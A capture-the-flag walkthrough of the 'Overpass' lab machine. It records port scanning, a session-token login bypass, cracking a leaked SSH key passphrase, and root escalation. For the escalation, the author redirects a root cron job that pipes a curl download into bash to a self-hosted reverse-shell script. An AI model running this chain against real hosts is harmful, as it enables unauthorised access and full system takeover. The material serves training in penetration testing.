As usual first i started with rustscan
got all these results
Open 10.10.162.100:22
Open 10.10.162.100:80
Then did a nmap scan on these ports
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLYC7Hj7oNzKiSsLVMdxw3VZFyoPeS/qKWID8x9IWY71z3FfPijiU7h9IPC+9C+kkHPiled/u3cVUVHHe7NS68fdN1+LipJxVRJ4o3IgiT8mZ7RPar6wpKVey6kubr8JAvZWLxIH6JNB16t66gjUt3AHVf2kmjn0y8cljJuWRCJRo9xpOjGtUtNJqSjJ8T0vGIxWTV/sWwAOZ0/TYQAqiBESX+GrLkXokkcBXlxj0NV+r5t+Oeu/QdKxh3x99T9VYnbgNPJdHX4YxCvaEwNQBwy46515eBYCE05TKA2rQP8VTZjrZAXh7aE0aICEnp6pow6KQUAZr/6vJtfsX+Amn3
| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMyyGnzRvzTYZnN1N4EflyLfWvtDU0MN/L+O4GvqKqkwShe5DFEWeIMuzxjhE0AW+LH4uJUVdoC0985Gy3z9zQU=
| 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwiYH+1GSirMK5KY0d3m7Zfgsr/ff1CP6p14fPa7JOR
80/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 0D4315E5A0B066CEFD5B216C8362564B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After all these I started enumerating the website!
as the tags given to the machine was owasp top 10
So, I started for looking for the OWASP vuln in the website
on the side started a gobuster scan and got all these directories available
/img (Status: 301) [Size: 0] [ → img/]
/downloads (Status: 301) [Size: 0] [ → downloads/]
/aboutus (Status: 301) [Size: 0] [ → aboutus/]
/admin (Status: 301) [Size: 42] [ → /admin/]
/css (Status: 301) [Size: 0] [ → css/]
went to admin page found a login page started doing looking for sql and other vuln! after some unsuccessful tried i just! looked
the Debugger part where i saw the login.js file read through that i found something related to session token started playing with that and did this
after that i refreshed the page and got the ssh keys for james
copied that ssh keys and pasted inn one of the folder tried to crack the ssh passphrase! like this pasted the ssh key into the overpass_ssh ! after that i converted the keys into the hash so the john can crack the file!
got the passphrase as james13
after that i just logged in into the ssh of james
ssh -i overpass_ssh james@10.10.162.100
First what i did was
sudo -l
but it asked for password didnt got anything good! after that tried to look for suid files but havent got anything good
find / -type f -perm -u=s 2>/dev/null
then i just checked for crontab and saw this
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
as you can see it is downloading something from overpass.thm and passing it into the bash! as a root user so i just ! tried to fake the website by making a directory with sub directories
download/src/buildscript.sh
and editing the /etc/hosts file in the victim pc
like this
and making a rev shell file in my pc named buildscipt.sh and hosting that file
now i just hosted the downloads folder by using
python3 -m http.server
and started a nc listener on other terminal
now as the victim pc runs the crontab command it will download the file from my pc and send a rev shell on the attacker pc
and i will get root!
waited for sometime and got the root shell on my pc
DONE!